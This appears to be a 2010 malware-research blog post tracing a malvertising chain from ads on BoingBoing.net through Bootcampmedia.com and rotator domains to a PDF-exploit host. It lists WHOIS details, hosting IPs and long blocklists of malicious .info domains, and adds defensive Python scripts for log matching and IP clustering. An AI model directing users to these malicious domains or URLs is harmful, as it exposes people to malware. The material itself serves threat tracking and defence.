More on malvertisements running through Bootcampmedia.com

Sandi at Spyware Sucks has a closer look at the malvertisements running through Bootcampmedia.com and comes up with some more details, following up from this post yesterday.

In this case the endpoint of the infection chain has switched to bonnapet.com on 217.20.114.40, hosted by netdirekt e.K. / internetserviceteam.com, which is hardly surprising as they are one of the more common havens for crimeware. The internetserviceteam.com name appears to be a sub-brand used for black hat hosting.. perhaps it is time for a visit from the Bundespolizei?

Tuesday, 12 January 2010

BoingBoing.net / Bootcampmedia.com ad leads to malware


A malicious ad running on BoingBoing.net is delivering visitors to a PDF exploit.

Given the complicated state of advertising arbitrage, it is unlikely that BoingBoing.net have much control over it. The ad appears to be loading in from ad.yieldmanager.com (which is Yahoo!) and/or ad.z5x.net (DSNR Media Group) both of which are hosted on the same multihomed IP addresses.

The ad itself (pictured) appears to be some sort of get-rich-quick scheme or other.

This ad then directs through ads.bootcampmedia.com/servlet/ajrotator/790744/0/vh?z=BootCamp&dim=335848 to traffic.firedogred.com/content?campaign=1219131&sz=2 (this combination of bootcampmedia.com and firedogred.com has been noted before)

The ad then hops to deliver.amerchibchapowered.com/rotate?m=5;b=2;c=1;z=243826 then content.baalcootymalachi.com/track/3388182/S_SE?[snip] loading an image from img.amerchibchapowered.com along the way.

Finally, the visitor is directed to chohivyb.info/cgi-bin/aer/[snip] which contains an exploit detected as Troj/PDFJs-GI by Sophos.
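The same chain shape turns up in every one of these posts (the AdSlash.com hops, the zoombanner.com chain and the BoingBoing.net chain above): publisher, then an ad network, then a traffic.* or ad.* entry host, a deliver.* rotator, a content.* tracker, and finally a .info payload host. When one of these indicators shows up in your proxy logs the useful question is which upstream network handed the visitor to it. The script below is an added example and not part of the original post: it matches log lines against the domains and netblocks named in these posts, then walks the Referer headers backwards within the same client to recover the chain and name the hop just before the first listed domain. The log format, the log lines and the chohivyb.info path are constructed for the example (the post snips the real path); the blocklist entries are taken from the posts.

```python
"""Match proxy log lines against the malvertising indicators from these posts and
walk the Referer chain back to the ad network that served the hit.
Log format and log lines are constructed for this example, not real traffic."""
import ipaddress
import re
import urllib.parse

# Domains named in the posts. Subdomains of a listed domain also match.
BAD_DOMAINS = {
    "firedogred.com", "amerchibchapowered.com", "baalcootymalachi.com",
    "chohivyb.info", "zoombanner.com", "commismanderakis.com",
    "fishpotboutademalled.com", "jduvazuc.info", "worldseescolor.com",
}
# Netblocks the posts suggest blocking outright.
BAD_NETS = [ipaddress.ip_network(n) for n in
            ("216.150.79.0/24", "217.23.7.0/24", "213.108.56.0/21")]

# Constructed log format: client_ip time dest_ip url referer ("-" when absent)
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")

# Constructed sample session modelled on the BoingBoing chain described above.
SAMPLE_LOG = """\
10.0.0.5 09:12:01 203.0.113.10 http://boingboing.net/ -
10.0.0.5 09:12:02 203.0.113.20 http://ads.bootcampmedia.com/servlet/ajrotator/790744/0/vh?z=BootCamp&dim=335848 http://boingboing.net/
10.0.0.5 09:12:02 69.164.215.204 http://traffic.firedogred.com/content?campaign=1219131&sz=2 http://ads.bootcampmedia.com/servlet/ajrotator/790744/0/vh?z=BootCamp&dim=335848
10.0.0.5 09:12:03 74.207.232.250 http://deliver.amerchibchapowered.com/rotate?m=5;b=2;c=1;z=243826 http://traffic.firedogred.com/content?campaign=1219131&sz=2
10.0.0.5 09:12:03 69.164.196.55 http://content.baalcootymalachi.com/track/3388182/S_SE http://deliver.amerchibchapowered.com/rotate?m=5;b=2;c=1;z=243826
10.0.0.5 09:12:04 216.150.79.74 http://chohivyb.info/cgi-bin/aer/PLACEHOLDER http://content.baalcootymalachi.com/track/3388182/S_SE
10.0.0.9 09:13:00 198.51.100.7 http://example.com/news -
"""


def domain_is_listed(host):
    """True if host equals, or is a subdomain of, a listed domain."""
    labels = host.lower().split(".")
    return any(".".join(labels[i:]) in BAD_DOMAINS for i in range(len(labels)))


def ip_is_listed(ip):
    """True if the destination address falls inside one of the blocked netblocks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in BAD_NETS)


def host_of(url):
    return urllib.parse.urlsplit(url).hostname or ""


def parse_log(lines):
    records = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            client, ts, dest_ip, url, referer = m.groups()
            records.append({"client": client, "ts": ts, "ip": dest_ip,
                            "url": url, "referer": referer})
    return records


def find_hits(records):
    return [r for r in records
            if domain_is_listed(host_of(r["url"])) or ip_is_listed(r["ip"])]


def referer_chain(records, hit, max_hops=10):
    """Follow Referer headers backwards within the same client to recover the chain,
    oldest hop first. Stops at a missing referer, an unknown URL or a loop."""
    by_url = {}
    for r in records:
        if r["client"] == hit["client"]:
            by_url.setdefault(r["url"], r)
    chain, seen, cur = [hit["url"]], {hit["url"]}, hit
    while cur["referer"] != "-" and cur["referer"] in by_url and len(chain) < max_hops:
        prev = by_url[cur["referer"]]
        if prev["url"] in seen:
            break
        chain.append(prev["url"])
        seen.add(prev["url"])
        cur = prev
    return list(reversed(chain))


def upstream_network(chain):
    """Hostname of the hop just before the first listed domain: the party that
    handed traffic into the malicious chain, i.e. the ad network to contact."""
    prev = None
    for url in chain:
        if domain_is_listed(host_of(url)):
            return host_of(prev) if prev else None
        prev = url
    return None


def analyse(log_text):
    """Return (hit_url, upstream_host, chain) for every indicator hit in the log."""
    records = parse_log(log_text.splitlines())
    return [(h["url"], upstream_network(referer_chain(records, h)),
             referer_chain(records, h)) for h in find_hits(records)]


if __name__ == "__main__":
    for hit_url, upstream, chain in analyse(SAMPLE_LOG):
        print(f"{hit_url}\n  upstream: {upstream}\n  chain: {' -> '.join(host_of(u) for u in chain)}")
```

On the constructed session this reports four hits (firedogred, amerchibchapowered, baalcootymalachi and chohivyb) and names ads.bootcampmedia.com as the upstream for each, which is the network a publisher would need to raise the campaign with. Real proxy logs often record the referer only for the first request of a redirect, so in practice the chain walk is a best effort and the client/time window is the fallback.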

"Boot Camp Media" is run by a guy called Jamie Dalgetty of Guelph, Ontario in Canada. It's unlikely that he's a bad guy, more likely that his ad network is being exploited by a malcious third party.

traffic.firedogred.com is rather more interesting: it is multihomed on 69.164.215.204, 69.164.215.205, 69.164.215.207, 69.164.215.208 and 69.164.215.210 at Linode, New Jersey, and the WHOIS record for firedogred.com is worth a look:

Registrant:
Domain Owner
15156 SW 5th
Scottsdale, Arizona 85260
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)

Domain Name: FIREDOGRED.COM
Created on: 15-Sep-09
Expires on: 15-Sep-10
Last Updated on: 15-Sep-09

Administrative Contact:
Owner, Domain trafficbuyer@gmail.com
15156 SW 5th
Scottsdale, Arizona 85260
United States
(800) 555-1212 Fax --

Technical Contact:
Owner, Domain trafficbuyer@gmail.com
15156 SW 5th
Scottsdale, Arizona 85260
United States
(800) 555-1212 Fax --

Domain servers in listed order:
NS57.DOMAINCONTROL.COM
NS58.DOMAINCONTROL.COM

trafficbuyer@gmail.com has been used for these malicious domains for some months and is well known.

deliver.amerchibchapowered.com is also multihomed at Linode on 74.207.232.250, 74.207.232.25, 74.207.232.30, 74.207.232.31, 74.207.232.35, 74.207.232.39, 74.207.232.202, 74.207.232.203, 74.207.232.205, 74.207.232.206, 74.207.232.248 and 74.207.232.249. The domain was registered on 7th January 2010 and is hidden by DomainsByProxy.

content.baalcootymalachi.com is hosted on 69.164.196.55, at Linode again, and was also registered on 7th January via DomainsByProxy.

img.amerchibchapowered.com is hosted on a large number of servers at 174.143.243.90, 174.143.243.162, 174.143.243.220, 174.143.245.236, 98.129.236.154, 98.129.236.239, 98.129.236.254, 98.129.237.14, 98.129.238.99, 98.129.238.101, 98.129.238.102, 98.129.238.103, 98.129.238.105, 98.129.238.106, 98.129.238.112, 174.143.241.174, 174.143.242.58, 174.143.242.109 - these are all hosted at Slicehost.com which is a customer of Rackspace.

Finally, chohivyb.info is hosted on 216.150.79.74 which is some outfit called ezzi.net of New York owned by another outfit called AccessIT. No prizes for guessing that chohivyb.info has been registered only very recently with anonymous details.
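Across these posts the hostnames line up on the same few addresses: the ad.*/traffic.* entry hosts on 69.164.215.x, the deliver.* rotators on 74.207.232.x, the content.* trackers on 69.164.196.55, the img.* hosts on the Slicehost ranges and the payload domains on 216.150.79.74. The following is an added example (not from the original post) that makes that pivot mechanical: it takes hostname-to-IP observations as recorded in the posts, trimmed to a representative subset of addresses where a post lists many, and clusters hostnames that share an address transitively, so that a new domain resolving into one of these ranges is tied straight to the known campaign. The observation table is transcribed from the posts; the clustering code and its names are my own.

```python
"""Cluster the hostnames documented in these posts by shared hosting IPs.
OBSERVED is transcribed from the posts (subset of addresses where many are listed);
the clustering logic is an added example, not the original author's code."""
import ipaddress
from collections import defaultdict

OBSERVED = {
    "ad.zoombanner.com": ["69.164.215.205", "69.164.215.204"],
    "traffic.firedogred.com": ["69.164.215.204", "69.164.215.205", "69.164.215.207"],
    "traffic.worldseescolor.com": ["69.164.215.208", "69.164.215.210", "69.164.215.205"],
    "deliver.commismanderakis.com": ["74.207.232.205", "74.207.232.206", "74.207.232.248"],
    "deliver.amerchibchapowered.com": ["74.207.232.250", "74.207.232.25", "74.207.232.205"],
    "deliver.bailagequinismregrow.com": ["74.207.232.205", "74.207.232.250"],
    "content.fishpotboutademalled.com": ["69.164.196.55"],
    "content.baalcootymalachi.com": ["69.164.196.55"],
    "content.cabullacoexertstephen.com": ["69.164.196.55"],
    "img.amerchibchapowered.com": ["174.143.243.90", "174.143.243.220", "98.129.236.154"],
    "img.bailagequinismregrow.com": ["174.143.243.220", "98.129.238.102", "98.129.236.154"],
    "jduvazuc.info": ["216.150.79.74"],
    "chohivyb.info": ["216.150.79.74"],
    "adslash.com": ["217.23.7.6"],
    "aanserver88.com": ["67.225.149.152"],
}


class DisjointSet:
    """Union-find with path halving; hosts sharing an IP end up under one root."""

    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def cluster_by_shared_ip(observed):
    """Hostnames that share at least one IP, directly or transitively, form one
    cluster. Returns a sorted list of sorted hostname lists."""
    ds = DisjointSet()
    first_seen_on = {}  # ip -> first host observed on it
    for host, ips in observed.items():
        ds.find(host)
        for ip in ips:
            if ip in first_seen_on:
                ds.union(first_seen_on[ip], host)
            else:
                first_seen_on[ip] = host
    clusters = defaultdict(set)
    for host in observed:
        clusters[ds.find(host)].add(host)
    return sorted((sorted(c) for c in clusters.values()), key=lambda c: c[0])


def cluster_by_netblock(observed, prefix=24):
    """Coarser view: group hosts by the /prefix their addresses fall in, which is
    what the posts do by eye with the Linode /24s."""
    nets = defaultdict(set)
    for host, ips in observed.items():
        for ip in ips:
            net = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
            nets[str(net)].add(host)
    return {net: sorted(hosts) for net, hosts in sorted(nets.items())}


def related_known_hosts(observed, ips):
    """Given the addresses a newly seen hostname resolves to, return the known
    hosts sitting on any of the same addresses."""
    wanted = set(ips)
    return sorted(h for h, hips in observed.items() if wanted & set(hips))


if __name__ == "__main__":
    for cluster in cluster_by_shared_ip(OBSERVED):
        print(", ".join(cluster))
    print()
    for net, hosts in cluster_by_netblock(OBSERVED).items():
        print(f"{net}: {', '.join(hosts)}")
```

With the data from the posts this produces seven clusters: the three entry hosts, the three deliver.* rotators, the three content.* trackers, the two img.* hosts, the two .info payload domains, and adslash.com and aanserver88.com on their own. A new deliver.* or content.* hostname from a fresh campaign only needs one resolved address to be dropped into the right cluster.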

216.150.79.74 is a well-known malware server and hosts the following domains, which you can assume are malicious:

  • Ablxsr.info
  • Ajgdrt.info
  • Alevfq.info
  • Alfwqr.info
  • Alrpsl.info
  • Ameronada.info
  • Bnzbfz.info
  • Bodxmt.info
  • Bplimo.info
  • Briliantio.info
  • Bvqlag.info
  • Bzjsqk.info
  • Ccwarj.info
  • Cityopicos.info
  • Clthth.info
  • Ctksji.info
  • Dasyxe.info
  • Dbivoh.info
  • Dgltup.info
  • Dpuefh.info
  • Dtjblp.info
  • Enhmqq.info
  • Enqpqk.info
  • Euespj.info
  • Exmxfd.info
  • Fblooe.info
  • Fdwghs.info
  • Fopqde.info
  • Fprvsu.info
  • Frgbat.info
  • Fymjjz.info
  • Gelvmf.info
  • Gnautw.info
  • Gnysgg.info
  • Gredotcom.info
  • Grupodanot.info
  • Grxqog.info
  • Gukuny.info
  • Gyckjq.info
  • Hagijd.info
  • Haqdsc.info
  • Hgtbng.info
  • Hjdnps.info
  • Hyiyyi.info
  • Iakecg.info
  • Iaoaxz.info
  • Iewwpn.info
  • Ijaflj.info
  • Iohbvo.info
  • Jhrubd.info
  • Jokirator.info
  • Kbwstb.info
  • Kibfsz.info
  • Klamniton.info
  • Ktebkx.info
  • Kxlglw.info
  • Leeloe.info
  • Lgcezx.info
  • Lkraat.info
  • Lktcaj.info
  • Llchqs.info
  • Lnmrjz.info
  • Lokitoreni.info
  • Lqhczk.info
  • Lywavy.info
  • Lyzocu.info
  • Mallstern.info
  • Manaratora.info
  • Megafrontan.info
  • Mesxql.info
  • Mngmjc.info
  • Monsatrik.info
  • Montrealt.info
  • Mruvienno.info
  • Mrvsnq.info
  • Nalszu.info
  • Ncnzfh.info
  • Neiaea.info
  • Nigrandara.info
  • Njcmug.info
  • Npmkrr.info
  • Ntaxkj.info
  • Obzdkn.info
  • Ocftfa.info
  • Optugj.info
  • Otfcco.info
  • Owpwhi.info
  • Pbrugb.info
  • Plxxii.info
  • Pncgfd.info
  • Ppusmb.info
  • Prbakn.info
  • Qdinql.info
  • Qgxelo.info
  • Qqtwft.info
  • Realuqitor.info
  • Refrentora.info
  • Retuvarot.info
  • Rfouce.info
  • Rljysj.info
  • Rocqdn.info
  • Roeaaj.info
  • Semqef.info
  • Snosrz.info
  • Spgsgh.info
  • Stqvqw.info
  • Swrapz.info
  • Tcoqgo.info
  • Tehfnn.info
  • Top-lister1.info
  • Transforltd.info
  • Tsfxzg.info
  • Tyenxv.info
  • Ugrdzf.info
  • Uliganoinc.info
  • Urupnk.info
  • Utpxno.info
  • Uyguau.info
  • Vbqfdm.info
  • Veqibp.info
  • Vkfaao.info
  • Vwwtlp.info
  • Wddifv.info
  • Wdhcvv.info
  • Wdokxd.info
  • Wevoratora.info
  • Wtstds.info
  • Wvkjxx.info
  • Wvlsam.info
  • Xbhmws.info
  • Xbxynl.info
  • Xcisup.info
  • Xxiyrv.info
  • Ybeaxd.info
  • Yfntrg.info
  • Yqjxkj.info
  • Ywbxen.info
  • Zdkaki.info
  • Zhwtqz.info
  • Zlpbha.info
  • Znkwjc.info
  • Zqpwco.info
Unlocker.org.uk is located on the same server, but it doesn't seem to fit in with the malware delivery and perhaps it is best to assume that it is a coincidence.

Obviously block or null-route these destinations as you feel fit, and do not purchase any ads from firedogred.com!

Added: You probably want to block these too..

216.150.79.76
  • Cacorq.info
  • Clxhbz.info
  • Dgrxqh.info
  • Diwiowano.info
  • Dmdurz.info
  • Funkol.info
  • Geetol.info
  • Gitoer.info
  • Gondiroda.info
  • Gutrandin.info
  • Hizfek.info
  • Hopore.info
  • Ivgzda.info
  • Jopqae.info
  • Kolpao.info
  • Nadotraza.info
  • Niraynome.info
  • Ofahitino.info
  • Oirjsa.info
  • Ornotivec.info
  • Pirtaf.info
  • Popsto.info
  • Rellok.info
  • Ruhcsy.info
  • Sacmtf.info
  • Sdoras.info
  • Tapiroten.info
  • Tiizwb.info
  • Traxemere.info
  • Ulmqmq.info
  • Vivibt.info
  • Xsxydj.info
  • Yuncdjbiw.info
  • Yyoqny.info

216.150.79.77
  • Bnodas.info
  • Brasilianstoree.info
  • Byzypub.info
  • Depahugu.info
  • Gionasodor.info
  • Giratunes.info
  • Gyreal.info
  • Hlopki.info
  • Huerin.info
  • Igerinsar.info
  • Jcafuzixa.info
  • Joketarona.info
  • Koevoru.info
  • L-iza.info
  • Laryju.info
  • Manocoraz.info
  • Nbuuf.info
  • Npefu.info
  • Nvihobepo.info
  • Pe-aqemop.info
  • Pyneh.info
  • Retiof.info
  • Rzajexu.info
  • Tolkienad.info
  • Tymane.info
  • Typolazu.info
  • Vfoxoe.info
  • Wanitale.info
  • Yawibyve.info
  • Ydiuvy.info
  • Zoimie.info